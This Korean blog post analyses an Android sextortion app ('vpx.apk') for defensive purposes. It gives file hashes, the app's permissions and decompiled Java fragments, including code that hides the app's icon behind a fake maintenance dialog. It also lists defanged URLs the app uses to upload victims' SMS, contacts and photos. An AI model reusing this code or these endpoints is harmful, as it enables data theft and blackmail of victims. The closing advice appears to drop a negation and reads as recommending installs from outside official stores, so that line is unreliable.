오늘은 안드로이드 몸캠인 vpx.apk(동영상)에 대해 알아보겠습니다. 일단 몸캠 이라는 것은 간단하게 음란 채팅을 하다가 너 이 파일 다운로드 해야 더 이야기할 것이니~이런저런 이야기로 사용자 스마트폰에다가 해당 APK 파일을 내려받기해서 설치해서 실행하게 하는 수법을 사용하고 있고 이렇게 설치가 되면 스마트폰에 있는 연락처 정보는 기본적으로 뺴가나가고 그리고 해당 연락처를 바탕으로 너~돈 안 보내시면 연락처에 있는 사람들한테 너~거시기 한 동영상 뿌린다고 협박을 하는 방식이고 그렇다고 돈을 주더라도 동영상 삭제를 해주는 것은 당연히 안될 확률도 높습니다.
일단 오늘 vpx.apk(동영상)이라는 것은 대해 알아보겠습니다. 먼저 해쉬값은 다음과 같습니다.
MD5:2914abd93ab252a7dacd23aa6958a7f6
SHA-1:53d04d427f7194f24069f002300acbbc850fa9cd
SHA-256:43bcb986c1eca65bde66010582ad43bede092d93c9f23b0b95872d4cb5dd8ac0
그리고 해당 APK 파일을 분해짓? 을 하면 AndroidManifest.xml 에서는 다음과 같습니다.
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas(.)android.com/apk/res/android" android:compileSdkVersion="28" android:compileSdkVersionCodename="9" package="com.karean(.)kakaotalk" platformBuildVersionCode="28" platformBuildVersionName="9">
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
보시면 문자, 스마트폰 저장공간, 와이파이, 네트워크, 연락처 등을 볼 수가 있습니다.
com.open.gitmessage.receiver.SmsReceiver 에 있는 내용은 다음과 같습니다.
public class SmsReceiver extends BroadcastReceiver {
/* renamed from: b */
public static String m4835b() {
return new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date(System.currentTimeMillis()));
}
/* access modifiers changed from: protected */
/* renamed from: a */
public String mo4679a() {
return "http://api082804.seemonitor(.)xyz/uploadSms(.)htm";
업로드 관련 부분:
http://api082804.seemonitor(.)xyz/sychonizeUser.htm http://api082804.seemonitor(.)xyz/uploadAlbum.htm http://api082804.seemonitor(.)xyz/uploadContact.htm http://api082804.seemonitor(.)xyz/uploadSms.htm
그리고 com.open.gitmessage.http.f 부분에 있는 내용은 다음과 같습니다.
private void b(Context paramContext) {
String str;
NetworkInfo networkInfo = ((ConnectivityManager)paramContext.getSystemService("connectivity")).getActiveNetworkInfo();
d.a("############当前网络状态改变#############");
if (networkInfo == null) {
str = "";
} else {
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.append("******当前活动网络为");
stringBuilder.append(networkInfo.getTypeName());
d.a(stringBuilder.toString());
if (1 == networkInfo.getType()) {
a("");
a(true);
return;
}
if (networkInfo.getType() == 0) {
str = b.a((Context)str);
} else {
return;
여기서 중국 부분이 있는데 중국어 몰라서 구글 번역기 돌려보면 다음과 같이 번역이 되었습니다.
当前网络状态改变:현재 네트워크 상태 변경
当前活动网络为:현재 활성 네트워크는
com.open.gitmessage.MainActivityBak 관련 부분에 보면 다음과 같습니다.
package com.open.gitmessage;
import android.annotation.SuppressLint;
import android.app.Activity;
import android.app.AlertDialog;
import android.content.Context;
import android.content.DialogInterface;
import android.content.Intent;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.text.TextUtils;
import android.view.View;
import com.open.gitmessage.a.c;
import com.open.gitmessage.a.e;
import com.yanzhenjie.permission.a;
import com.yanzhenjie.permission.d;
import com.yanzhenjie.permission.h;
import com.yanzhenjie.permission.j;
import com.yanzhenjie.permission.k;
import java.util.List;
import java.util.UUID;
@SuppressLint({"NewApi"})
public class MainActivityBak extends Activity implements View.OnClickListener {
int a = 0;
AlertDialog b;
private Handler c = new Handler(this) {
public void handleMessage(Message param1Message) {
if (param1Message.what == this.a.a) {
AlertDialog.Builder builder = new AlertDialog.Builder((Context)this.a);
builder.setMessage("서버정검중입니다").setTitle("").setCancelable(false).setPositiveButton("OK", new DialogInterface.OnClickListener(this) {
public void onClick(DialogInterface param2DialogInterface, int param2Int) {
this.a.a.getPackageManager().setComponentEnabledSetting(this.a.a.getComponentName(), 2, 1);
this.a.a.finish();
}
});
this.a.b = builder.create();
this.a.b.show();
}
}
};
서버정검중입니다 이라는 문구를 볼 수가 있는데 서버정검중입니다. 이 아니고 서버 점검 중입니다. 라는 것을 알 수가 있습니다. 한국어 맞춤법도 틀린 내용을 넣은 것을 볼 수가 있습니다. (아마도 중국인, 조선족 아니면 오타일 가능성으로 추측해 봅니다.)
여기서 사용이 되는 Api082804.seemonitor(.)xyz 부분을 보면 다음과 같은 정보를 확인을 할수가 있습니다.
Nameservers:
ns20.domaincontrol.com:173(.)201.77.10
ns19.domaincontrol.com:97.74(.)109.10
Location For an IP: Api082804(.)seemonitor.xyz
Continent:North America (NA)
Country:United States
IP Location Find In United States (US)
Capital:Washington
State:Unknown
City Location:Unknown
ISP:CloudRadium L.L.C
Organization:CloudRadium L.L.C
AS Number:AS33330 CloudRadium L.L.C
something went wrong!
something went wrong!
입니다.
그리고 악성코드가 사용하는 주소는 다음과 같습니다.
http://api082804.seemonitor(.)xyz/sychonizeUser.htm
http://api082804.seemonitor(.)xyz/uploadContact.htm
입니다. 일단 바이러스 토탈에서 해당 APK를 올려보면 기본적으로 대부분 차단을 하고 있습니다. 일단 공식 스토어가 아니면 다운로드 및 설치를 하는 것을 권장하고(물론 가끔 악성코드 올라옴) 반드시 백신앱을 실시간 감시 및 실시간 업데이트는 반드시 해야 안전하게 스마트폰을 사용할 수가 있습니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| Microsoft Windows 10 KB4571756 보안 업데이트 (4) | 2020.09.09 |
|---|---|
| 구글 크롬 안드로이드용 Google Chrome에서 보안 DNS(Secure DNS) 지원 출시 (2) | 2020.09.08 |
| 국민은행 사칭 피싱 앱-KB.apk(2020,9.2) (4) | 2020.09.07 |
| Windows 10(윈도우10) 버전 2004 업데이트 KB4571744 (방대한 수정) (2) | 2020.09.06 |
| Thunderbird 78.2.1(선더버드 78.2.1)에서 기본적으로 OpenPGP가 활성화 (4) | 2020.09.01 |
| 네이버 카페를 통해서 네이버 계정 탈취를 노리는 피싱 사이트(2020.8.30) (6) | 2020.08.31 |
| 파이어폭스 80.0(Firefox 80.0) 보안 업데이트 (4) | 2020.08.27 |
| Windows 10(윈도우 10)에서 기본적 TLS 1.3 활성화 기능 추가 예정 (4) | 2020.08.26 |
